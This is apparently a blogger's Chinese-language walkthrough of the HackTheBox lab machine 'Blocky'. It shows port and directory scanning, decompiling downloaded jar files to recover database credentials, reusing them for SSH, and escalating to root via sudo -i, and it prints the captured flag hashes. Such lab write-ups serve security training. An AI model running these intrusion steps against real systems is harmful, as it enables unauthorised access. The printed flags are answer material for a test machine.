0x00 靶场技能介绍 章节技能:目录扫描、jar文件反编译读源码、sudo -i 切换root用户
参考链接:官方引导
0x01 用户权限获取 1、这是一个简单的靶机,却也是我觉得最符合oscp的靶机,有兔子洞,但是又存在多种可能
2、常规获取下靶机IP地址:10.10.10.37
3、扫描下开放端口信息
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 ┌─[us-vip-22]─[10.10.14.4]─[htb-shiyan@htb-tlqbfgzof4]─[~/Desktop] └──╼ [★]$ sudo nmap -sC -sV -T4 -Pn 10.10.10.37 Starting Nmap 7.93 ( https://nmap.org ) at 2023-12-12 06:25 GMT Nmap scan report for 10.10.10.37 Host is up (0.043s latency). Not shown: 996 filtered tcp ports (no-response) PORT STATE SERVICE VERSION 21/tcp open ftp ProFTPD 1.3.5a 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 d62b99b4d5e753ce2bfcb5d79d79fba2 (RSA) | 256 5d7f389570c9beac67a01e86e7978403 (ECDSA) |_ 256 09d5c204951a90ef87562597df837067 (ED25519) 80/tcp open http Apache httpd 2.4.18 |_http-title: Did not follow redirect to http://blocky.htb |_http-server-header: Apache/2.4.18 (Ubuntu) 8192/tcp closed sophos Service Info: Host: 127.0.1.1; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
4、这里发现个域名,本地加入下hosts
1 2 3 ┌─[us-vip-22]─[10.10.14.4]─[htb-shiyan@htb-tlqbfgzof4]─[~/Desktop] └──╼ [★]$ echo "10.10.10.37 blocky.htb" | sudo tee -a /etc/hosts 10.10.10.37 blocky.htb
5、由于存在21端口,我这里尝试了ftp匿名登录,但是无果,我又ftp软件版本漏洞测试无果、ssh版本漏洞无果、Apache版本漏洞无果。
6、这里80端口首页是wordpress,我尝试了wpscan扫描,又尝试了wp版本漏洞等均无果、后台弱口令无果。。。
7、至此,我陷入了迷茫,感觉做的靶机越多,越觉得哪里都是漏洞,只要出现版本号。
8、由于觉得这个是wp框架,我就懒了目录扫描了,这里继续目录扫描下,结果发现了奇点
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 ┌─[us-vip-22]─[10.10.14.4]─[htb-shiyan@htb-tlqbfgzof4]─[~/Desktop] └──╼ [★]$ gobuster dir -u http://blocky.htb --wordlist=/usr/share/dirbuster/wordlists/directory-list-1.0.txt =============================================================== Gobuster v3.1.0 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart) =============================================================== [+] Url: http://blocky.htb [+] Method: GET [+] Threads: 10 [+] Wordlist: /usr/share/dirbuster/wordlists/directory-list-1.0.txt [+] Negative Status codes: 404 [+] User Agent: gobuster/3.1.0 [+] Timeout: 10s =============================================================== 2023/12/12 07:54:26 Starting gobuster in directory enumeration mode =============================================================== /wiki (Status: 301) [Size: 307] [--> http://blocky.htb/wiki/] /plugins (Status: 301) [Size: 310] [--> http://blocky.htb/plugins/] /phpmyadmin (Status: 301) [Size: 313] [--> http://blocky.htb/phpmyadmin/] /wp-content (Status: 301) [Size: 313] [--> http://blocky.htb/wp-content/] /wp-admin (Status: 301) [Size: 311] [--> http://blocky.htb/wp-admin/]
9、这里发现了2个压缩包文件,下载下来,使用jd-gui进行反编译下看看内容
10、在这里发现了数据库的账号密码,这里我想起了以前的htb的靶场套路,使用root直接ssh登录,登录失败,但是在网站首页有个用户名信息的
11、到这里使用该账号名,成功登录系统,并获取到第一个flag信息
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 ┌──(kali㉿kali)-[~/桌面] └─$ ssh notch@10.10.10.37 notch@10.10.10.37's password: Welcome to Ubuntu 16.04.2 LTS (GNU/Linux 4.4.0-62-generic x86_64) * Documentation: https://help.ubuntu.com * Management: https://landscape.canonical.com * Support: https://ubuntu.com/advantage 7 packages can be updated. 7 updates are security updates. Last login: Fri Jul 8 07:16:08 2022 from 10.10.14.29 To run a command as administrator (user "root"), use "sudo <command>". See "man sudo_root" for details. notch@Blocky:~$ pwd /home/notch notch@Blocky:~$ ls -la total 40 drwxr-xr-x 5 notch notch 4096 Jul 8 2022 . drwxr-xr-x 3 root root 4096 Jul 2 2017 .. -rw------- 1 notch notch 1 Dec 24 2017 .bash_history -rw-r--r-- 1 notch notch 220 Jul 2 2017 .bash_logout -rw-r--r-- 1 notch notch 3771 Jul 2 2017 .bashrc drwx------ 2 notch notch 4096 Jul 2 2017 .cache drwxrwxr-x 7 notch notch 4096 Jul 2 2017 minecraft drwxrwxr-x 2 notch notch 4096 Jul 2 2017 .nano -rw-r--r-- 1 notch notch 655 Jul 2 2017 .profile -r-------- 1 notch notch 33 Dec 12 00:23 user.txt notch@Blocky:~$ cat user.txt 5ca90bc0edb9f99b3b0a33f9ddc79f88 notch@Blocky:~$
0x02 系统权限获取 12、这里通过 sudo -l ,发现可以直接切换到root用户。
1 2 3 4 5 6 7 8 9 10 11 12 13 notch@Blocky:~$ sudo -l [sudo] password for notch: Matching Defaults entries for notch on Blocky: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin User notch may run the following commands on Blocky: (ALL : ALL) ALL notch@Blocky:~$ sudo -i root@Blocky:~ root@Blocky:~ 601338ca4a3ab4f549f0723ea3ae4cca root@Blocky:~
0x03 通关凭证展示 https://www.hackthebox.com/achievement/machine/1705469/48
http:\sh1yan.top\photo\